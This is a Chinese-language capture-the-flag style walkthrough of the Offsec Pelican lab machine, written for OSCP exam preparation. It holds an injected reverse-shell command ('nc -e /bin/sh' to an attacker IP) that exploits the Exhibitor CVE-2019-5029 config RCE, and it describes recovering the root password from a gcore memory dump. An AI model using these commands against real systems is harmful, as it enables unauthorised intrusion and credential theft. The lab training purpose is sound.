-
-
kali一台(当然你也可以用windows或者其他Linux及其发行版)
sudo nmap -sV -sC -Pn -n 192.168.159.98 -p- --open
--open:nmap脚本和版本信息探测只在开放端口上进行
可以看到开放了 2个web端口(8080,8081),其中8081访问后会跳转到8080,web为一个zookeeper Exhibitor(联想:使用searchsploit查看是否存在相关漏洞可利用)
java-rmi端口36303(联想:rmi反序列化)
ssh(22,2222)(爆破攻击?[实在无法进行下去之后的操作])
Samba(445)(爆破攻击或者漏洞CVE-2017-7494 Samba RCE)
注意:OSCP官方考试指导(截至发稿日期)中有提到,整个考试过程中仅允许在目标机器使用metasplit和mefvenom一次,切不管利用成功和失败,整场考试以及其他机器都不再允许使用!!!!!
2.zookeeper-exhibitor(8080)漏洞信息搜索与利用
使用浏览器访问地址可以发现该服务不存在认证,版本为1.0
searchsploit搜索exhibitor.可以看到1.7.1以下版本存在一个RCE漏洞。漏洞编号为CVE-2019-5029
文中提到在Exhibitor的Config项目下,存在一个java.env.script的用户可输入项,当用户在其中输入恶意的java脚本并提交更改后,系统会执行其中的内容。如下。
攻击者机器运行penelope(https://github.com/brightio/penelope)来接受反弹shell。[python penelope.py 8090]
通过输入$(/bin/nc -e /bin/sh 192.168.45.182 8090 &)并点击commit提交后,等待penelope接收并启动交互式shell。
获取到的shell权限为charles,普通权限。查找第一个flag文件(local.txt),一般就在web目录或当前用户的家目录,如果没找到的话可以尝试find搜索。
注意:考试当中,拿到权限后第一时间去找flag并截图保存,截图的时候,根据OSCP官方考试指导,截图中需要包含权限信息,IP信息,flag信息,flag所在目录信息。
3.权限提升获取root目录下proof.txt中的flag
运行sudo -l 和 find / -perm -u=s -type f 2>/dev/null,查看是否可以通过sudo或者suid进行提权(linux提权相关知识https://blog.csdn.net/HUANGXIN9898/article/details/139233272)
通过运行以上命令我们看到,/usr/bin/gcore可以使用sudo运行且不需要输入密码。gcore这个程序是一个用于生成正在运行的程序的核心转储文件(core dump)的工具。核心转储文件是程序在崩溃或异常终止时的内存快照,包含了程序的状态信息,便于后续的调试和分析。
我们看看通过这个程序我们是否可以做一些事情。通过ps -aux 查看进程信息
可以看到存在一个叫做password-store的进程,通过进程名字猜测可能跟密码储存相关?我们使用gcore来导出他的内存信息。
运行sudo gcore -a -o /home/charles/pass-store.out 513
这边通过strings pass-store.out.513提取这个转储文件中的字符串信息,发现存在一个001 Password: root:的字符串,接在他后面的字符串ClogKingpinInning731是不是密码?
使用strings提取出来的疑似密码内容切换root用户,成功切换
1.信息收集很重要,全端口TCP端口扫描(必要时UDP也需要扫描)
1.https://github.com/brightio/penelope
2.https://blog.csdn.net/HUANGXIN9898/article/details/139233272
3.https://github.com/adeljck/OSCP
原文始发于微信公众号(Xsafe):Offsec PG靶场-Pelican(OSCP考试)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
点赞
https://cn-sec.com/archives/3689549.html
复制链接
复制链接
-
左青龙
- 微信扫一扫
-
-
右白虎
- 微信扫一扫
-
评论